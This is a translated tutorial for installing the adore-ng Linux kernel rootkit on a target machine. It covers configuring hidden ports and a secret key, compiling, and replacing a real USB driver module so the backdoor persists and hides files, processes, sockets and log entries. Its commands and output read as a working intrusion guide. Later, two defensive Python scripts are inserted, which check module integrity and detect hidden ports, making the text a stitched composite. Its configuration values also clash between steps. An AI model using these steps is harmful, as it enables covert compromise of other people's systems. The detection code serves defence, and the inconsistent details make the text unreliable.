adore-ng, the latest Linux kernel-level backdoor: usage details

Source: Internet
Author: User

adore-ng is a kernel-level backdoor for Linux and an excellent LKM rootkit. The latest version is currently 0.54; it works on 2.4 to 2.6 kernels and is very stable. Below we demonstrate its powerful functions step by step. Log on to the target machine as root and download adore-ng to it.

A backdoor is a technique an intruder uses, once the system is fully under control, to make the next entry easy.

It may modify system configuration files or install a third-party backdoor tool. It is concealed, can bypass system logging, and is not easily discovered by system administrators.

It is really not easy to find a good Linux backdoor. I just collected this article for you. For more information, see www.linuxso.com.

Preface:
Kernel 2.6 has made its way into the Linux world, and backdoor and webshell writing must keep up with the trend.

Shorthand convention:
fc: Fedora Core
rh: Red Hat
rhel4: Red Hat Enterprise Linux 4
sk: SucKIT
adore: adore-ng
rk: rootkit
lkm: loadable kernel module

What is adore-ng?
Googling "adore" will turn up plenty of details about this LKM rk.

Why choose it?
1. I didn't get sk for 2.6.
2. /dev/kmem is disabled by default in Red Hat kernels after FC2, so sk cannot inject itself into the running kernel, and many rk-checking programs fail for the same reason :)
3. adore is written by Daniel Stealth and has a long history, with more than N people helping him test it, so it should be more stable than other LKMs. Since the stability of an LKM directly affects the stability of the system, we must be cautious in choosing one: even a feature-rich module is useless if the system hangs after a little use and you get discovered.

Features:
[root@RHEL4 adore-ng]# cat FEATURES

If you never used Adore before, here's a list of supported
things:

o runs on kernel 2.4.x UP and SMP systems
o runs on kernel 2.6.x UP and SMP systems, i386 and x86_64 archs tested
o file and directory hiding
o process hiding
o socket-hiding (no matter whether LISTENing, CONNECTED etc)
o full-capability back door
o does not utilize sys_call_table but VFS layer
o KISS principle, to have less things in there as possible
  but also being as much powerful as possible
o hides itself from /proc and /sys filesystems

o syslog filtering: logs generated by hidden processes never appear
  on the syslog UNIX socket anymore
o wtmp/utmp/lastlog filtering: writing of xtmp entries by hidden processes
  do not appear in the file, except you force it by using special hidden
  AND authenticated process (a sshd back door is usually only hidden thus
  xtmp entries written by sshd don't make it to disk)
o (optional) relinking of LKMs as described in phrack #61 aka LKM infection
  to make it possible to be automatically reloaded after reboots (2.4 and 2.6)

Environment:
A physical machine, not a virtual machine.
[root@RHEL4 adore-ng]# uname -a; cat /etc/redhat-release
Linux RHEL4 2.6.9-5.EL #1 Wed Jan 5 19:22:18 EST 2005 i686 athlon i386 GNU/Linux
Red Hat Enterprise Linux AS release 4 (Nahant)

Download:
Google "adore-ng",
or look for it on the website http://baoz.net.

Edit and compile:
[root@RHEL4 adore-ng]# mv Makefile.2.6 Makefile

Edit the following lines:
EXTRA_CFLAGS=-DELITE_UID=2618748389U -DELITE_GID=4063569279U
EXTRA_CFLAGS+=-DCURRENT_ADORE=54
EXTRA_CFLAGS+=-DADORE_KEY="fgjgggfd"

These are the hidden TCP ports. Do not change the trailing 0:
u_short HIDDEN_SERVICES[] = {2222, 7350, 0};

If this is an SMP machine, enable the following:
EXTRA_CFLAGS+=-D__SMP__

Set the location of your kernel source:
KERNEL_SOURCE=/usr/src/linux

OK, save and exit, then make.

[root@RHEL4 adore-ng]# make
cc -DELITE_UID=2634745389u -DELITE_GID=6063589279U -DCURRENT_ADORE=54 -DADORE_KEY="djksDfNvn" -DHIDE ava.c libinvisible.c -o ava
ava.c:47: warning: integer constant is too large for "unsigned long" type
ava.c:47: warning: large integer implicitly truncated to unsigned type
libinvisible.c: In function 'adore_hidefile':
libinvisible.c:76: warning: integer constant is too large for "unsigned long" type
libinvisible.c:76: warning: large integer implicitly truncated to unsigned type
make -C /usr/src/linux SUBDIRS=`pwd` modules
make[1]: Entering directory `/usr/src/kernels/2.6.9-5.EL-i686'
  CC [M]  /root/adore-ng/adore-ng-2.6.o
/root/adore-ng/adore-ng-2.6.c:56: warning: 'MODULE_PARM_' is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c:59: warning: 'MODULE_PARM_' is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c:61: warning: 'MODULE_PARM_' is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c: In function 'adore_opt_filldir':
/root/adore-ng/adore-ng-2.6.c:281: warning: integer constant is too large for "unsigned long" type
/root/adore-ng/adore-ng-2.6.c:281: warning: comparison is always false due to limited range of data type
/root/adore-ng/adore-ng-2.6.c: In function 'adore_root_filldir':
/root/adore-ng/adore-ng-2.6.c:363: warning: integer constant is too large for "unsigned long" type
/root/adore-ng/adore-ng-2.6.c:363: warning: comparison is always false due to limited range of data type
  Building modules, stage 2.
  MODPOST
  CC      /root/adore-ng/adore-ng-2.6.mod.o
  LD [M]  /root/adore-ng/adore-ng-2.6.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.9-5.EL-i686'
cc -O2 symsed.c -o symsed

Let's talk about its relink, which is the function that inserts adore into another module. Let's see what it does:
system("cp $lkm_path t.ko");
system("./symsed t.ko zero; ld -r adore-ng-2.6.ko t.ko -o z.ko; rm -f t.ko");
print "\nCopy trojaned LKM back to original LKM? (y/n) \n";

while ($yn !~ /^(y|n)$/i) {
    $yn = <STDIN>;
    $yn =~ s/\n//;
}

if ($yn =~ /y/i) {
    system("cp z.ko $lkm_path");
} else {
    print "\nOutput LKM is z.ko\n";
}
After relinking into a module on RHEL4, the module would not load for me, but it doesn't matter: we don't insert adore into another module, we replace one :)
Hardly anyone ever runs modprobe -r on the modules a system was installed with, so we can easily replace a module the system doesn't need. Let's look at my modules:
[root@RHEL4 adore-ng]# lsmod
Module                  Size  Used by
dm_mod                 54741  0
ohci_hcd               21713  0
snd_intel8x0           33769  0
snd_ac97_codec         63889  1 snd_intel8x0
snd_pcm_oss            49017  0
snd_mixer_oss          17985  1 snd_pcm_oss
snd_pcm                96841  2 snd_intel8x0,snd_pcm_oss
snd_timer              29893  1 snd_pcm
snd_page_alloc          9673  2 snd_intel8x0,snd_pcm
snd_mpu401_uart         8769  1 snd_intel8x0
snd_rawmidi            26597  1 snd_mpu401_uart
snd_seq_device          8137  1 snd_rawmidi
snd                    54949  9 snd_intel8x0,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device
soundcore               9889  1 snd
sis900                 18756  0
ext3                  116809  1
jbd                    71257  1 ext3

Choose a module with "Used by" 0 that isn't really needed, such as a USB driver.
I had already used ehci_hcd, so it no longer shows up here; ohci_hcd or the sound card module would also do.

See where it lives:
[root@RHEL4 adore-ng]# modprobe -l | grep ehci
/lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko

Unload it:
[root@RHEL4 adore-ng]# modprobe -r ehci-hcd
Replace it:
[root@RHEL4 adore-ng]# cp adore-ng-2.6.ko /lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko
Load it:
[root@RHEL4 adore-ng]# modprobe ehci-hcd
Check it:
[root@RHEL4 adore-ng]# ./ava I
Checking for adore 0.12 or higher...
Adore 1.54 installed. Good luck.

ELITE_UID: 2648745389, ELITE_GID=1768621983, ADORE_KEY=djksdfnvn CURRENT_ADORE=54

Exposure:
If the other side runs tripwire (installed by default on RHEL4), the replaced ehci-hcd.ko is very easy to expose, but there is no way around it; even the relinked module would be exposed, heh.
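The exposure just described is worth making concrete from the administrator's side. What follows is an added example, not code from this article or from the adore-ng package: a small baseline-and-verify script in the spirit of tripwire that hashes every .ko file under a module tree and reports files that were modified, added or removed since the baseline was taken. The module root, the baseline file name and the command-line usage are assumptions.

```python
"""Baseline-and-verify check for kernel module files.

Added example; not from the article or from the adore-ng package.
A driver file overwritten with a different module (the ehci-hcd.ko
replacement above) shows up as 'modified'; a module planted under a
new name shows up as 'added'; a deleted driver shows up as 'removed'.
"""
import hashlib
import json
import os
from typing import Dict, List


def hash_file(path: str) -> str:
    """SHA-256 of one file, read in chunks so large modules are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(module_root: str) -> Dict[str, str]:
    """Map every .ko under module_root (path relative to the root) to its hash."""
    baseline: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(module_root):
        for name in files:
            if name.endswith(".ko"):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, module_root)] = hash_file(full)
    return baseline


def diff_baselines(current: Dict[str, str],
                   baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Pure comparison of two snapshots, keyed by relative module path."""
    return {
        "modified": sorted(p for p in current
                           if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def verify(module_root: str, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Hash the tree now and compare it with a stored baseline."""
    return diff_baselines(build_baseline(module_root), baseline)


def save_baseline(baseline: Dict[str, str], path: str) -> None:
    with open(path, "w") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)


def load_baseline(path: str) -> Dict[str, str]:
    with open(path) as f:
        return json.load(f)


if __name__ == "__main__":
    import sys
    # Assumed defaults: the running kernel's module tree and a baseline file
    # in the current directory. Usage: modcheck.py baseline|verify [root] [file]
    mode = sys.argv[1] if len(sys.argv) > 1 else "verify"
    root = sys.argv[2] if len(sys.argv) > 2 else "/lib/modules/" + os.uname().release
    bl_path = sys.argv[3] if len(sys.argv) > 3 else "modules-baseline.json"
    if mode == "baseline":
        save_baseline(build_baseline(root), bl_path)
    else:
        for kind, paths in verify(root, load_baseline(bl_path)).items():
            for p in paths:
                print(kind, p)
```

Take the baseline from a known-good system and keep it, together with the checker, off the host on read-only media. A kernel rootkit can lie to any userland tool that runs on the compromised kernel (adore-ng hides files and processes at the VFS layer), so a verification run is only trustworthy when done from a clean boot. On an RPM-based system, rpm -V kernel performs the same comparison against the package database for the vendor's own module files.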

Questions:
1. Hidden ports (adore-ng.h) go decimal, i.e. '000000' hides everything which belongs to port 2222.
I took this to mean that the processes related to port 2222 are hidden at the same time. Well, maybe I misunderstood his "everything" :)
[root@RHEL4 ~]# nc -vvnlp 2222
listening on [any] 2222 ...

[root@RHEL4 adore-ng]# ps aux | grep 2222
root      1938  0.0  0.1  1724  496 pts/1    S+   nc -vvnlp 2222
root      1941  0.0  0.1  5304  684 pts/0    S+   grep 2222
2. [root@RHEL4 adore-ng]# grep full-capability FEATURES
o full-capability back door
This is a bit confusing. This "backdoor" is clearly a local root, and I personally wouldn't call a local root a backdoor.
[root@RHEL4 adore-ng]# ./ava | grep root
r execute as root
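Question 1 above probes port hiding from the attacker's seat, with nc listening on 2222. The same fact gives an administrator a detection: a hidden port is dropped from the kernel's /proc/net/tcp view, but the socket still holds the port, so a second bind() on it fails with EADDRINUSE. The following is an added example, not code from the article or from adore-ng, that compares the two views and reports ports in use yet unreported. The constructed /proc/net/tcp sample, the port range and the probe function are assumptions.

```python
"""Cross-view check for TCP ports hidden from /proc/net/tcp.

Added example; not from the article or from the adore-ng package.
"""
import errno
import socket
from typing import Callable, Iterable, List, Set

LISTEN = "0A"  # state code used by /proc/net/tcp for LISTEN

# Constructed sample of /proc/net/tcp: a listener on 22 (0x0016), the nc
# listener on 2222 (0x08AE), and one established connection from an
# ephemeral port (0xB2F2 = 45810) to 22.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9001 1 c1c1c1c1 300 0 0 2 -1
   1: 00000000:08AE 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9002 1 c2c2c2c2 300 0 0 2 -1
   2: 0100007F:B2F2 0100007F:0016 01 00000000:00000000 00:00000000 00000000     0        0 9003 1 c3c3c3c3 20 4 30 10 -1
"""


def local_ports(proc_net_tcp_text: str, only_listening: bool = False) -> Set[int]:
    """Local ports the kernel reports. Ports are hexadecimal in this file,
    so the decimal 2222 from HIDDEN_SERVICES appears as 08AE."""
    ports: Set[int] = set()
    for line in proc_net_tcp_text.splitlines()[1:]:   # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        local, state = fields[1], fields[3]
        if only_listening and state != LISTEN:
            continue
        ports.add(int(local.rsplit(":", 1)[1], 16))
    return ports


def port_in_use(port: int) -> bool:
    """Real probe: bind() on the wildcard address fails with EADDRINUSE if
    any socket already holds the port, whether or not it is reported."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.bind(("0.0.0.0", port))
        return False
    except OSError as e:
        return e.errno == errno.EADDRINUSE
    finally:
        s.close()


def hidden_ports(reported: Set[int], candidates: Iterable[int],
                 probe: Callable[[int], bool] = port_in_use) -> List[int]:
    """Ports the probe finds in use that the reported view does not contain."""
    return sorted(p for p in candidates if p not in reported and probe(p))


if __name__ == "__main__":
    with open("/proc/net/tcp") as f:
        reported = local_ports(f.read())
    for p in hidden_ports(reported, range(1, 65536)):
        print("in use but absent from /proc/net/tcp:", p)
```

Run it as root so that ports below 1024 can be probed (an EACCES from bind() is not counted as "in use"); /proc/net/tcp6 has the same layout for IPv6 sockets. The comparison uses every local port the kernel reports, not only LISTEN entries, so the ephemeral port of an outgoing connection is not mistaken for a hidden listener. Like the file integrity check, the probe only works because the kernel still enforces bind() honestly: it catches a rootkit that filters the /proc view, not one that also tampers with the socket layer.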
